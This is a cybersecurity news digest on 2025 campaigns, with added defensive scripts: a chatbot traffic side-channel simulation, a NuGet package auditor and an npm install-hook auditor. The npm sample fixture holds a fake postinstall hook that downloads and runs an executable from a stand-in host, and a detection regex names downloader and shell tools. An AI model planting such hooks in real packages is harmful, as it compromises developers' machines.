Latest Cybersecurity News, Summarized


APT Group Exploits Zero-Day Vulnerabilities in Cisco and Citrix Systems

Amazon’s threat intelligence team uncovered a cyber-espionage campaign in which an advanced persistent threat (APT) group exploited zero-day vulnerabilities in Cisco Identity Services Engine (ISE) and Citrix NetScaler appliances, going after the identity and network-access-control layer before either vendor had shipped a patch. The exploitation attempts hit Amazon’s MadPot honeypot service, which led to the identification of CVE-2025-5777 (Citrix NetScaler) and CVE-2025-20337 (Cisco ISE). The actor deployed a custom web shell disguised as a legitimate ISE component; it ran entirely in memory and encrypted its communications with a custom scheme, leaving little on disk for conventional scanning to find. Security teams are advised to apply the vendor fixes, layer defense-in-depth controls around edge and identity infrastructure, and monitor these appliances closely for anomalous activity.

7 sources

Hackers Abuse Google Find Hub to Wipe Android Devices

Hackers are abusing Google’s Find Hub to track and remotely factory-reset Android devices. The attacks begin with spear-phishing messages on a popular messaging app that lead victims to run malicious files, which install remote access trojans. With the trojan in place, the attackers harvest the victim’s Google account credentials, sign in to Find Hub, and use its remote-wipe capability to erase the device. They also use Find Hub’s location tracking to time the wipe for moments when the victim is unlikely to respond quickly. The campaign is attributed to a known APT group, illustrating how state-sponsored actors are turning legitimate device-management features against their targets.

7 sources

Lazarus Group Espionage Campaign Targets Aerospace and Defense

Security researchers at ENKI have uncovered a sophisticated espionage campaign by the Lazarus Group targeting aerospace and defense organizations. Active since March 2025, the campaign relies on phishing operations that deliver malicious Word documents disguised as legitimate communications; the documents deploy a new variant of the Comebacker backdoor with updated encryption and persistence mechanisms. The narrow targeting points to a deliberate espionage effort, and security teams are advised to harden against macro-based malware (for example, by blocking macros in Office files that came from the internet) and to train users to recognize spear-phishing lures.

2 sources

DragonForce Ransomware Evolves with BYOVD Techniques

The Acronis Threat Research Unit has identified a new DragonForce ransomware variant that uses Bring Your Own Vulnerable Driver (BYOVD) techniques to disable security software: the malware loads a legitimately signed but vulnerable driver and uses it to forcibly terminate antivirus and EDR processes from kernel mode. The variant also fixes encryption flaws present in earlier builds and carries an encrypted configuration file, a marked step up in technical sophistication. DragonForce emerged in 2023 and later rebranded itself as a ransomware "cartel", attracting affiliates with customizable encryptors and access to shared infrastructure. The group has grown more aggressive, increasing its global victim postings and expanding collaborations; its most prominent campaign was a joint attack on a major retailer alongside the Scattered Spider intrusion group.

5 sources

Critical Triofox Vulnerability Exploited by UNC6485

Researchers at Mandiant Threat Defense, part of Google Cloud Security Operations, have detailed a critical unauthenticated-access vulnerability in Gladinet’s Triofox file-sharing platform. The flaw, now patched as CVE-2025-12480, let attackers bypass authentication and ultimately execute code as SYSTEM. Mandiant first observed exploitation on August 24, 2025, against version 16.4.10317.56372, and attributes the activity to a cluster it tracks as UNC6485. Gladinet has released a fix, and the vulnerability is resolved in newer Triofox versions. After bypassing authentication, the attackers created an administrative account and used it to run malicious scripts with SYSTEM privileges, then used PuTTY and Plink to open an SSH tunnel for covert, persistent access.

3 sources

Ransomware Groups Exploit RMM Vulnerabilities for Attacks

Cybersecurity researchers at Zensec uncovered a supply-chain attack campaign in early 2025 in which two prominent ransomware-as-a-service groups exploited critical vulnerabilities in SimpleHelp remote monitoring and management (RMM) software to breach managed service providers and, through them, the providers’ downstream customers. The attacks leveraged three severe vulnerabilities, allowing attackers to bypass traditional security controls and move laterally with minimal friction. Although patches were available, many organizations were still compromised throughout Q1 and Q2 2025.

3 sources

Whisper Leak Attack: AI Chatbots Vulnerable Despite Encryption

Microsoft researchers have identified a side-channel attack, dubbed Whisper Leak, that infers the topic of a conversation from encrypted traffic between a user and an AI chatbot. TLS hides the content, but because responses are streamed token by token, the sizes and inter-arrival times of the encrypted packets form a pattern that a trained classifier can map back to a prompt topic. Several vendors have deployed mitigations, such as adding random-length padding to streamed responses, but the attack remains a significant risk for users on networks where an observer such as an ISP or a state surveillance apparatus can see their traffic. Microsoft has published the methodology and models on GitHub for further research.
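The mechanism is easier to see in a small simulation. The block below is an added illustration, not Microsoft’s Whisper Leak code: it generates streamed-response record sizes for two hypothetical prompt topics from constructed, deliberately separable length profiles (real tokens are far less distinct per chunk, and the real classifier also uses timing), trains a nearest-centroid classifier on the sizes an on-path observer would see, and then repeats the experiment with every chunk padded to a fixed bucket. The TLS overhead constant and the bucket size are assumptions for the example.

```python
import random
from statistics import mean

TLS_OVERHEAD = 22  # assumed fixed per-record overhead (header + AEAD tag); illustrative
PAD_BUCKET = 64    # mitigation: pad each streamed chunk up to a multiple of this size

# Constructed plaintext-length ranges (bytes per streamed chunk) for two hypothetical
# prompt topics. Deliberately separable so the leak is visible in a few lines.
PROFILES = {"topic_a": (3, 9), "topic_b": (7, 20)}


def stream_record_sizes(topic, n_chunks, rng, pad_to=None):
    """Record sizes an on-path observer sees for one streamed response.

    The plaintext itself is never exposed; only its length (plus overhead) is.
    """
    lo, hi = PROFILES[topic]
    sizes = []
    for _ in range(n_chunks):
        plaintext_len = rng.randint(lo, hi)
        if pad_to:
            plaintext_len = -(-plaintext_len // pad_to) * pad_to  # ceil to bucket
        sizes.append(plaintext_len + TLS_OVERHEAD)
    return sizes


def features(sizes):
    """Per-stream traffic features. Real attacks add inter-arrival timing."""
    return (mean(sizes), max(sizes), min(sizes))


def fit_centroids(training):
    """training: list of (topic, sizes). Returns one feature centroid per topic."""
    by_label = {}
    for label, sizes in training:
        by_label.setdefault(label, []).append(features(sizes))
    return {
        label: tuple(mean(f[i] for f in feats) for i in range(3))
        for label, feats in by_label.items()
    }


def predict(centroids, sizes):
    """Nearest-centroid classification; ties resolve to the first label."""
    f = features(sizes)
    return min(
        sorted(centroids),
        key=lambda label: sum((a - b) ** 2 for a, b in zip(f, centroids[label])),
    )


def run_experiment(pad_to=None, seed=7, streams_per_topic=100, n_chunks=40):
    """Train on half the streams, test on the other half, return accuracy."""
    rng = random.Random(seed)
    data = [
        (topic, stream_record_sizes(topic, n_chunks, rng, pad_to))
        for _ in range(streams_per_topic)
        for topic in PROFILES
    ]
    half = len(data) // 2
    centroids = fit_centroids(data[:half])
    hits = sum(predict(centroids, sizes) == topic for topic, sizes in data[half:])
    return hits / (len(data) - half)


if __name__ == "__main__":
    print("topic recovery, no padding:   ", run_experiment())
    print("topic recovery, 64-byte pads: ", run_experiment(pad_to=PAD_BUCKET))
```

With no padding the classifier recovers the topic from record sizes alone; once every chunk is padded to the same bucket the size features collapse to a constant and accuracy falls to chance. Fixed-bucket padding only closes the length channel: chunk timing still leaks, which is why batching tokens before sending, or adding random-length filler as the vendors did, are part of a real mitigation.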

5 sources

Fantasy Hub: Advanced Android RAT Sold as MaaS on Cybercrime Channels

Researchers at Zimperium’s zLabs have uncovered Fantasy Hub, a sophisticated Android Remote Access Trojan (RAT) sold as Malware-as-a-Service (MaaS) on cybercrime channels. The spyware gives operators full device control, data exfiltration, and banking-credential theft; its phishing-overlay system imitates the login screens of major banks so that stolen credentials can be used to compromise accounts in real time. Fantasy Hub relies on evasion techniques and social engineering to bypass detection and user scrutiny.

3 sources

Malicious NuGet Packages Target Databases and Siemens PLCs

Researchers discovered nine malicious NuGet packages designed to sabotage database operations and Siemens S7 industrial control systems. Published under the developer name shanhai666, the packages bundle working functionality with malicious code that is time-gated to activate between 2027 and 2028, so a clean install today shows no symptoms. The most dangerous package, Sharp7Extend, targets Siemens PLCs with two sabotage mechanisms: immediate process termination and delayed corruption of PLC write operations. Organizations are advised to audit their projects, build systems, and package caches for these packages and to assume compromise if any are found.
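Because the payload is time-gated, presence of the package is the signal, not behaviour. The script below is an added example of that audit, not code from the researchers who reported the packages: it walks a source tree for SDK-style `.csproj` `PackageReference` entries and legacy `packages.config` entries, and optionally checks a NuGet global package cache directory, matching package IDs against a block list. Only Sharp7Extend is named on this page; the other block-list entries, the sample project files, and the version numbers are constructed placeholders to be replaced with the full indicator list from the report.

```python
import tempfile
import xml.etree.ElementTree as ET
from pathlib import Path

# Package IDs to hunt for (NuGet IDs are case-insensitive, so compare lower-cased).
# "sharp7extend" is from the report; the "example-bad-package-*" entries are
# placeholders for the remaining IDs, an assumption made for this example.
BLOCKLIST = {"sharp7extend", "example-bad-package-1", "example-bad-package-2"}


def _local(tag):
    """Strip an XML namespace prefix ({ns}Tag -> Tag); old-style csproj files use one."""
    return tag.split("}")[-1]


def packages_in_csproj(path):
    """Yield (id, version) for every PackageReference in a .csproj."""
    for el in ET.parse(path).iter():
        if _local(el.tag) != "PackageReference":
            continue
        pid = el.get("Include") or el.get("Update")
        ver = el.get("Version")
        if ver is None:  # Version may be a child element instead of an attribute
            for child in el:
                if _local(child.tag) == "Version":
                    ver = (child.text or "").strip()
        if pid:
            yield pid, ver or "?"


def packages_in_packages_config(path):
    """Yield (id, version) for every <package> in a legacy packages.config."""
    for el in ET.parse(path).iter():
        if _local(el.tag) == "package" and el.get("id"):
            yield el.get("id"), el.get("version") or "?"


def audit(root, nuget_cache=None):
    """Return [(where, package_id, version)] for every block-listed package found."""
    root = Path(root)
    findings = []
    for proj in sorted(root.rglob("*.csproj")):
        for pid, ver in packages_in_csproj(proj):
            if pid.lower() in BLOCKLIST:
                findings.append((str(proj.relative_to(root)), pid, ver))
    for cfg in sorted(root.rglob("packages.config")):
        for pid, ver in packages_in_packages_config(cfg):
            if pid.lower() in BLOCKLIST:
                findings.append((str(cfg.relative_to(root)), pid, ver))
    if nuget_cache:  # global cache layout is <cache>/<lower-case id>/<version>/
        for pkg_dir in sorted(Path(nuget_cache).iterdir()):
            if pkg_dir.is_dir() and pkg_dir.name.lower() in BLOCKLIST:
                for ver_dir in sorted(pkg_dir.iterdir()):
                    if ver_dir.is_dir():
                        findings.append((f"cache:{pkg_dir.name}", pkg_dir.name, ver_dir.name))
    return findings


# Constructed sample project files for the demonstration (not real projects).
CSPROJ = """<Project Sdk="Microsoft.NET.Sdk">
  <ItemGroup>
    <PackageReference Include="Newtonsoft.Json" Version="13.0.3" />
    <PackageReference Include="Sharp7Extend" Version="1.0.0" />
  </ItemGroup>
</Project>
"""

PACKAGES_CONFIG = """<?xml version="1.0" encoding="utf-8"?>
<packages>
  <package id="example-bad-package-1" version="2.0.0" targetFramework="net48" />
  <package id="Serilog" version="3.1.1" targetFramework="net48" />
</packages>
"""


def build_sample_tree():
    """Create a throwaway source tree plus a fake NuGet cache; returns (root, cache)."""
    root = Path(tempfile.mkdtemp())
    (root / "App").mkdir()
    (root / "App" / "App.csproj").write_text(CSPROJ, encoding="utf-8")
    (root / "Legacy").mkdir()
    (root / "Legacy" / "packages.config").write_text(PACKAGES_CONFIG, encoding="utf-8")
    cache = root / "nuget-cache"
    (cache / "sharp7extend" / "1.0.0").mkdir(parents=True)
    (cache / "newtonsoft.json" / "13.0.3").mkdir(parents=True)
    return str(root), str(cache)


if __name__ == "__main__":
    root, cache = build_sample_tree()
    for where, pid, ver in audit(root, cache):
        print(f"HIT {pid} {ver} in {where}")
```

Run it against a real checkout with `audit("/path/to/src", Path.home() / ".nuget" / "packages")`; any hit warrants treating the build host and everything it produced as compromised, per the researchers’ advice.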

3 sources

Midnight Ransomware: New Strain Offers Decryption Hope

A new ransomware strain, Midnight, has emerged that is derived from its predecessor, Babuk. First documented by Gen researchers, Midnight retains much of Babuk’s core structure but modifies the cryptographic scheme used for file encryption. Those changes were probably intended to make the ransomware more effective, but they introduced weaknesses that make decryption possible under certain conditions, a rare opportunity for victims to recover their data without paying. Security vendors have released a decryption tool targeting these flaws; it walks users through a wizard-based process to identify encrypted locations, verify file integrity, and restore data.

4 sources

Landfall Spyware Targets Samsung Galaxy Phones

Security researchers at Palo Alto Networks’ Unit 42 uncovered Landfall, a spyware family that exploited a zero-day vulnerability in Samsung Galaxy phones. The spyware was first seen in July 2024 and relied on a flaw Samsung patched in April 2025, so the campaign ran for months before it was detected. The attacks, likely espionage-driven, targeted individuals in a specific region, and Landfall’s infrastructure overlaps with that of the surveillance actor known as Stealth Falcon. Once installed, the spyware enables broad device surveillance, including access to photos, messages, and contacts as well as location tracking.

2 sources

Vidar Infostealer Malware Hits npm Ecosystem

Datadog Security Research discovered a supply chain attack on the npm ecosystem, attributed to the threat-actor cluster MUT-4831, in which 17 malicious packages delivered the Vidar infostealer to Windows systems. The packages masqueraded as legitimate software development kits and libraries and ran their payload from a postinstall lifecycle script, so simply installing one was enough to be infected. They were live for roughly two weeks and were downloaded at least 2,240 times before removal. The Vidar variant, compiled from Go, aggressively harvests sensitive data and locates its command-and-control servers through hardcoded Telegram and Steam accounts used as dead-drop resolvers. The campaign underscores the continuing exposure of open-source package ecosystems to supply-chain abuse.
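Install hooks are the delivery mechanism here, so a practical first check is to enumerate every package in a `node_modules` tree that declares one. The script below is an added example, not Datadog’s detection logic: it reads each installed package’s `package.json` (including `@scoped` packages), lists `preinstall`/`install`/`postinstall`/`prepare` scripts, and flags commands that match a small heuristic pattern for downloaders and shell launchers. The heuristic, the sample packages, and the URL in the constructed tree are assumptions for the example.

```python
import json
import re
import tempfile
from pathlib import Path

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Heuristic for hooks that fetch or launch something (an assumption for this
# example; tune to taste). Native addons legitimately run node-gyp, which this
# deliberately does not match.
SUSPICIOUS = re.compile(
    r"(curl|wget|Invoke-WebRequest|\biwr\b|powershell|cmd(\.exe)?\s*/c|node\s+-e|"
    r"bitsadmin|certutil|\.exe\b|base64)",
    re.IGNORECASE,
)


def iter_package_manifests(node_modules):
    """Yield package.json paths for every installed package, @scoped ones included."""
    for entry in sorted(Path(node_modules).iterdir()):
        if entry.name.startswith("@") and entry.is_dir():
            for scoped in sorted(entry.iterdir()):
                if (scoped / "package.json").is_file():
                    yield scoped / "package.json"
        elif (entry / "package.json").is_file():
            yield entry / "package.json"


def audit_install_hooks(node_modules):
    """Return one finding dict per lifecycle hook declared by an installed package."""
    findings = []
    for manifest in iter_package_manifests(node_modules):
        try:
            data = json.loads(manifest.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest; skip rather than crash the audit
        scripts = data.get("scripts") or {}
        for hook in LIFECYCLE_HOOKS:
            cmd = scripts.get(hook)
            if not cmd:
                continue
            findings.append({
                "package": data.get("name", manifest.parent.name),
                "version": data.get("version", "?"),
                "hook": hook,
                "command": cmd,
                "suspicious": bool(SUSPICIOUS.search(cmd)),
            })
    return findings


def build_sample_tree():
    """Create a constructed node_modules tree (not real packages) and return its path."""
    nm = Path(tempfile.mkdtemp()) / "node_modules"
    samples = {
        "left-pad-demo": {"name": "left-pad-demo", "version": "1.0.0"},
        "native-addon-demo": {
            "name": "native-addon-demo", "version": "2.1.0",
            "scripts": {"install": "node-gyp rebuild"},
        },
        "@acme/sdk-demo": {
            "name": "@acme/sdk-demo", "version": "0.3.1",
            "scripts": {"postinstall": "node -e \"require('child_process')"
                        ".exec('curl -o a.zip https://example.invalid/p && a.exe')\""},
        },
    }
    for name, manifest in samples.items():
        (nm / name).mkdir(parents=True)
        (nm / name / "package.json").write_text(json.dumps(manifest), encoding="utf-8")
    return str(nm)


if __name__ == "__main__":
    for f in audit_install_hooks(build_sample_tree()):
        flag = "SUSPICIOUS" if f["suspicious"] else "ok"
        print(f"{flag:10} {f['package']}@{f['version']} {f['hook']}: {f['command']}")
```

Point `audit_install_hooks` at a project’s real `node_modules` after a fresh install to review what ran. For CI and developer machines, `npm install --ignore-scripts` (or `npm config set ignore-scripts true`) prevents hooks from executing at all, at the cost of having to run the build steps of legitimate native packages yourself.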

4 sources